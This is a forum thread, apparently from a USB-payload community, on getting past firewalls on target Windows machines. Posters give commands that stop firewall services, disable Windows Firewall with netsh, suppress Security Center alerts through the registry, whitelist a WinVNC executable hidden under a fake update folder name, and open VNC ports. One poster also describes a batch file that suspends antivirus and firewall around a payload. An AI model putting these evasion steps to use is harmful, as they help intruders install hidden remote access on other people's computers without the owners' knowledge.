Jump to content

Recommended Posts

Posted

hi,

wut if the if a host has a firewall up & running? because the fw will catch it, saying a program is trying to send mail. how does 1 overcome this kinda scenario??

thx in adv

Posted

You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

Posted

erm ... for Net Stop to work u hafta know the other's pc's Username & pwd and u hafta do it from an an account that belongs to the Administrator's grp.

Also, if ya kill the FW, especially on boxes with SP2 installed, da Security Centre's msgs's will kick in n start displaying not loaded or some such msg. It may also start Windows own "firewall" if it can b considered a fw at all - lol.

Any other thoughts on this?

thx in adv

Posted

It's quite easy to disable the security center popups in the registry, and you can also add rules to the windows firewall through the registry.

Posted
erm ... for Net Stop to work u hafta know the other's pc's Username & pwd and u hafta do it from an an account that belongs to the Administrator's grp.

The payload is executed by a local admin account. You dont have to have a username and password, it will use the default profile credentials.

Just add "net stop service" at the top of your payload, and then you can "net start service" at the end to put the firewall back to normal.

The only issue is if the firewall has a task tray icon (And I dont know many that dont). Once you stop the service, the icon changes to show the status of the firewall.

Posted
You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

Do you know the service name for the windows firewall?

Posted

You don't have to disable the windows firewall, just add some registry entries and ur set. When using the WinVNC payload, you only have to add this registry file:

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirew
allPolicyStandardProfileAuthorizedApplicationsList]

"%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe"="%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe:*:Enabled:WinVnc"

"%appdata%NtUninstallKB21050c07160c070f0b0a0a05031b05WinVNC.exe"="%appdata%NtUninstallK21050c07160c070f0b0a0a05031b05WinVNC.exe:*:Enabled:WinVnc"

Just save it as vnc.reg, and in your go.cmd import it using "reg import vnc.reg" or "regedit /s vnc.reg".

Posted

What i want to do is just to disable the firewall for a short space of time, not using the switchblade or hacksaw.

But im doing somthing else that is blocked by the firewall, and the message is : For your protection windows firewall ahs blocked this operation' or somthing along those lines.

And i want to know if there is a way to turn it off, do what i want to do, and turn it back on again, by using a batch file etc.

Posted

I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center]

"FirewallDisableNotify"=dword:00000001

Posted
I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

kewl thx :D

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center]

"FirewallDisableNotify"=dword:00000001

thx again :D

Posted
You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

Do you know the service name for the windows firewall?

Just as a side note, if you know the admin pwd of a remote box which has remote registry enabled ( i think its enabled by default ) then u can use PSList from http:www.SysInternals.com to get a list of services running on dat box n snipe em one by 1.

Posted

i relly think you are better off using the netsh command then using premade registry entries, because of the chances that the comp does not successfully apply the reg key it could screwed up and the box is FUBAR.

also for the problem with firewalls i have just made a quick batch that pauses or suspends AV's, Spyware and firewall process / service and launch the payload and then a call a batch that resumes or starts the process's / services

Posted
I'm not using Windows Firewall myself, but I think that this should disable it:

netsh firewall set opmode disable

And to prevent the security center from popping up use this registry file:

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center]

"FirewallDisableNotify"=dword:00000001

that worked. Cheers =]

Posted
that worked. Cheers =]

No problem m8 :wink:

i relly think you are better off using the netsh command then using premade registry entries, because of the chances that the comp does not successfully apply the reg key it could screwed up and the box is FUBAR.

also for the problem with firewalls i have just made a quick batch that pauses or suspends AV's, Spyware and firewall process / service and launch the payload and then a call a batch that resumes or starts the process's / services

Can you post it?? I'm making one too, but I don't have a lot of different av/fws to test it with.

Posted

if you follow a similar syntax you should be able to add any port you like

netsh firewall add portopening TCP 5900 SMBv1

netsh firewall add portopening TCP 5800 SMBv2

netsh firewall add portopening UDP 5900 RDPv1

netsh firewall add portopening UDP 5800 RDPv2

it's basically "netsh firewall add portopening" and the the protocol then port then the comment. btw this is an example of how to apply it so vnc, btw tvnc does not use udp but i included it as an example

Posted
if you follow a similar syntax you should be able to add any port you like

netsh firewall add portopening TCP 5900 SMBv1

netsh firewall add portopening TCP 5800 SMBv2

netsh firewall add portopening UDP 5900 RDPv1

netsh firewall add portopening UDP 5800 RDPv2

it's basically "netsh firewall add portopening" and the the protocol then port then the comment. btw this is an example of how to apply it so vnc, btw tvnc does not use udp but i included it as an example

But doesn't that only work with Windows built in firewall?
Posted

yes that only for windows firewall for other's you will have to use the registry and even the the AV might intercept it as a virus or trojan trying to tamper with it's firewall

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...